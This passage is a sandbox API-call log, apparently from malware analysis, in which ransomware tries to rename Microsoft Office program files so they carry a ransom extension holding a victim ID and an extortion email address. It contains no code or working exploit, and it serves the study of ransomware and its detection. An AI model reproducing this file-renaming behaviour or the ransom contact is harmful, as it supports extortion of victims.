hTemplateFile=0x0) returned 0xffffffff [0166.835] CloseHandle (hObject=0x4c4) returned 1 [0166.836] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.836] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.836] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Project.x-none.msi.16_mondoww.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\project.x-none.msi.16_mondoww.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.836] CloseHandle (hObject=0x4c4) returned 1 [0166.837] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Publisher.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\publisher.x-none.msi.16_mondoww.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Publisher.x-none.msi.16_mondoww.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\publisher.x-none.msi.16_mondoww.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0166.838] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.838] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Visio.x-none.msi.16_mondoww.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\visio.x-none.msi.16_mondoww.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.838] CloseHandle (hObject=0x4c4) returned 1 [0166.839] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.839] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.840] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Visio.x-none.msi.16_PostCommon.Visio.x-none.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\visio.x-none.msi.16_postcommon.visio.x-none.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.840] CloseHandle (hObject=0x4c4) returned 1 [0166.841] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.841] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Word.x-none.msi.16_mondoww.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\word.x-none.msi.16_mondoww.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.841] CloseHandle (hObject=0x4c4) returned 1 [0166.842] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.842] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.842] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ACCESS12.ACC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\access12.acc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.842] CloseHandle (hObject=0x4c4) returned 1 [0166.846] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.846] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\AEC.VSL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\aec.vsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.846] CloseHandle (hObject=0x4c4) returned 1 [0166.847] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.847] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\AECUTILS.VSL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\aecutils.vsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.847] CloseHandle (hObject=0x4c4) returned 1 [0166.848] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.848] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.848] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ASSET.VRD.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\asset.vrd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.848] CloseHandle (hObject=0x4c4) returned 1 [0166.852] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.852] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.852] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\BSTORM.VSL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\bstorm.vsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.853] CloseHandle (hObject=0x4c4) returned 1 [0166.853] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.853] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.854] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\CALEVENT.VRD.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\calevent.vrd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.854] CloseHandle (hObject=0x4c4) returned 1 [0167.533] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\grooveintlresource.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GrooveIntlResource.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\grooveintlresource.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0167.536] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.536] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MOVE.VRD.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\move.vrd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.537] CloseHandle (hObject=0x52c) returned 1 [0167.538] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.538] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.538] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSACCESS.HXS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msaccess.hxs.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.539] CloseHandle (hObject=0x52c) returned 1 [0167.539] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.539] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.539] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSACCESS_COL.HXC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msaccess_col.hxc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.539] CloseHandle (hObject=0x52c) returned 1 [0167.540] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.540] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.540] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSACCESS_COL.HXT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msaccess_col.hxt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.540] CloseHandle (hObject=0x52c) returned 1 [0167.541] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.541] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSACCESS_F_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msaccess_f_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.541] CloseHandle (hObject=0x52c) returned 1 [0167.542] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.542] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.542] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSACCESS_K_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msaccess_k_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.542] CloseHandle (hObject=0x52c) returned 1 [0167.543] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.544] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSO.ACL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mso.acl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.544] CloseHandle (hObject=0x52c) returned 1 [0167.546] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.546] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.546] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSOUC.HXS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msouc.hxs.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.546] CloseHandle (hObject=0x52c) returned 1 [0167.547] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.547] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.547] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSOUC_COL.HXC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msouc_col.hxc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.547] CloseHandle (hObject=0x52c) returned 1 [0167.548] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.548] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.548] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSOUC_COL.HXT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msouc_col.hxt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.548] CloseHandle (hObject=0x52c) returned 1 [0167.549] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.549] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.549] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSOUC_F_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msouc_f_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.549] CloseHandle (hObject=0x52c) returned 1 [0167.550] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.550] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.550] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSOUC_K_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msouc_k_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.550] CloseHandle (hObject=0x52c) returned 1 [0167.551] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.551] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSPUB.HXS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mspub.hxs.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.551] CloseHandle (hObject=0x52c) returned 1 [0167.552] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.552] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.552] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSPUB.OPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mspub.opg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.553] CloseHandle (hObject=0x52c) returned 1 [0167.553] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.553] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSPUB_COL.HXC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mspub_col.hxc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.553] CloseHandle (hObject=0x52c) returned 1 [0167.554] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.555] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.555] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSPUB_COL.HXT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mspub_col.hxt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.555] CloseHandle (hObject=0x52c) returned 1 [0167.555] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.555] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.555] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSPUB_F_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mspub_f_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.556] CloseHandle (hObject=0x52c) returned 1 [0167.559] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.559] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.559] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSPUB_K_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mspub_k_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.559] CloseHandle (hObject=0x52c) returned 1 [0167.563] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.563] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\NETWORK1.VRD.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\network1.vrd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.564] CloseHandle (hObject=0x52c) returned 1 [0167.564] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.564] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.564] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\NETWORK2.VRD.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\network2.vrd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.564] CloseHandle (hObject=0x52c) returned 1 [0167.565] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.565] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.565] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\NETWORK3.VRD.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\network3.vrd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.565] 